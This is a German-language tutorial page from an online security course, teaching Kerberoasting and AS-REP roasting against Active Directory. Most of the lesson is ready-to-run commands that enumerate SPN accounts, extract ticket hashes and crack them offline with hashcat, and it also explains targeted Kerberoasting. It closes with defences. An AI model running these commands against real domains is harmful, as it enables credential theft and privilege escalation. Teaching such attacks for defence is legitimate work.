0Pricing
Cyber Security Academy · Lektion

Kerberoasting und AS-REP-Roasting

Fordern Sie Kerberos-Diensttickets an und knacken Sie sie offline mit Hashcat.

Kerberoasting und AS-REP-Roasting ist eine kostenlose Cyber Security Academy-Lektion auf CoddyKit. Dies ist Lektion 3 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Cyber Security Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.

Kerberos-Ticketverschlüsselung

Service-Tickets werden mit dem Passwort-Hash des Dienstkontos verschlüsselt. Jeder Domänenbenutzer kann ein Service-Ticket für jeden SPN anfordern. Wenn das Dienstkonto ein schwaches Passwort hat, kann das Ticket offline geknackt werden.

Was ist Kerberoasting?

Beim Kerberoasting werden Service-Tickets für Konten mit Service Principal Names (SPNs) angefordert, das verschlüsselte Ticket extrahiert und mit Hashcat offline geknackt. Dafür sind keine erhöhten Berechtigungen erforderlich: Jeder Domänenbenutzer kann dies tun.

# Steps:
# 1. Find accounts with SPNs
# 2. Request their service tickets
# 3. Extract ticket hashes
# 4. Crack with Hashcat

SPNs finden

Enumerieren Sie alle Dienstkonten mit SPNs mithilfe von PowerView, Impacket oder nativen AD-Tools. SPNs verknüpfen Dienstkonten mit ihren Diensten.

# PowerView (Windows)
Get-DomainUser -SPN
Get-NetUser -SPN | select name,serviceprincipalname

# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com

# Native LDAP query
ldapsearch -H ldap://dc -b "DC=corp,DC=com" \
  "(servicePrincipalName=*)" cn servicePrincipalName

Tickets anfordern und extrahieren

Rubeus (Windows) und GetUserSPNs aus Impacket (Linux) fordern beide Tickets an und geben sie in einem knackbar geeigneten Format aus.

# Rubeus (Windows)
Rubeus.exe kerberoast /format:hashcat /output:hashes.txt

# Impacket (Linux)
GetUserSPNs.py CORP/user:pass@dc.corp.com \
  -request -outputfile hashes.txt

Mit Hashcat knacken

Kerberoast-Hashes verwenden den Modus 13100 (Kerberos 5 TGS-REP). Verwenden Sie für eine maximale Effektivität eine umfangreiche Wortliste mit Regeln.

# Crack TGS-REP hashes
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

# With rules for better coverage
hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule

# AES tickets: mode 19700 (AES128) or 19800 (AES256)

Was ist AS-REP Roasting?

AS-REP Roasting zielt auf Konten, für die Do not require Kerberos pre-authentication aktiviert ist. Die AS gibt ein mit dem Hash des Benutzers verschlüsseltes TGT zurück. Es kann ohne Kenntnis des Passworts angefordert und offline geknackt werden.

Konten mit deaktivierter Vorauthentifizierung finden

Konten ohne Vorauthentifizierung sind eine Fehlkonfiguration, die häufig von älteren Anwendungen zurückgelassen wird. Enumerieren Sie sie mit PowerView oder GetNPUsers.

# PowerView
Get-DomainUser -PreauthNotRequired

# Impacket GetNPUsers (no password needed!)
GetNPUsers.py CORP/ -usersfile users.txt \
  -dc-ip dc.corp.com -format hashcat -outputfile asrep.txt

# Rubeus
Rubeus.exe asreproast /format:hashcat /output:asrep.txt

AS-REP-Hashes knacken

AS-REP-Hashes verwenden den Hashcat-Modus 18200. Der Crack-Vorgang ist derselbe wie beim Kerberoasting: ein Offline-Wörterbuchangriff auf die verschlüsselte AS-Antwort.

# Crack AS-REP hashes
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# With rules:
hashcat -m 18200 asrep.txt rockyou.txt -r best64.rule

Auswirkungsanalyse

Geknackte Passwörter von Dienstkonten verfügen häufig über erhöhte Berechtigungen. Dienstkonten, unter denen Datenbanken, Backup-Software oder Exchange ausgeführt werden, können Domänenadministratoren sein. AS-REP-Konten werden häufig übersehen und unzureichend geschützt.

Gezieltes Kerberoasting

Wenn Sie Schreibzugriff auf ein Objekt haben, können Sie vorübergehend einen SPN zu einem besonders wertvollen Konto hinzufügen, dieses per Kerberoasting angreifen, den Hash knacken und den SPN anschließend entfernen. So lassen sich gezielt bestimmte Konten nach Bedarf angreifen.

Schutzmaßnahmen

Schutz vor Kerberoasting: Verwenden Sie lange, zufällige Passwörter (25 oder mehr Zeichen) für Dienstkonten oder besser Group Managed Service Accounts (gMSA) mit automatisch wechselnden 120 Zeichen langen Passwörtern. Gegen AS-REP Roasting: Aktivieren Sie die Vorauthentifizierung für alle Konten.

Schnelltest

Welches Kontenattribut ist erforderlich, damit AS-REP Roasting funktioniert?

Zusammenfassung: Kerberoasting und AS-REP Roasting

Beide Angriffe nutzen Schwächen bei der Verschlüsselung von Kerberos-Tickets aus, um Passwörter offline zu knacken, ohne Kontosperrungen auszulösen. Kerberoasting zielt auf Konten mit SPNs ab (jeder Domänenbenutzer kann es durchführen). AS-REP Roasting zielt auf Konten ohne Vorauthentifizierung ab (keine Anmeldedaten erforderlich). Schützen Sie sich mit gMSA für Dienstkonten und erzwingen Sie die Vorauthentifizierung für alle Benutzer.

Häufig gestellte Fragen

Ist die Lektion „Kerberoasting und AS-REP-Roasting“ kostenlos?

Ja — der vollständige Text von „Kerberoasting und AS-REP-Roasting“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Cyber Security Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.

Was lerne ich in „Kerberoasting und AS-REP-Roasting“?

Fordern Sie Kerberos-Diensttickets an und knacken Sie sie offline mit Hashcat. Du übst Cyber Security Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.

Brauche ich Erfahrung, um Cyber Security Academy zu starten?

Keine Vorkenntnisse erforderlich. Cyber Security Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 3 von 4.

Wie lange dauert die Lektion „Kerberoasting und AS-REP-Roasting“?

Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.

Kann ich in dieser Cyber Security Academy-Lektion Code schreiben und ausführen?

Ja. Jede Cyber Security Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.

Alle Lektionen in diesem Kurs

  1. Windows-Authentifizierung: NTLM und Kerberos
  2. Pass-the-Hash- und Pass-the-Ticket-Angriffe
  3. Kerberoasting und AS-REP-Roasting
  4. Absicherung von Active Directory
← Zurück zu Cyber Security Academy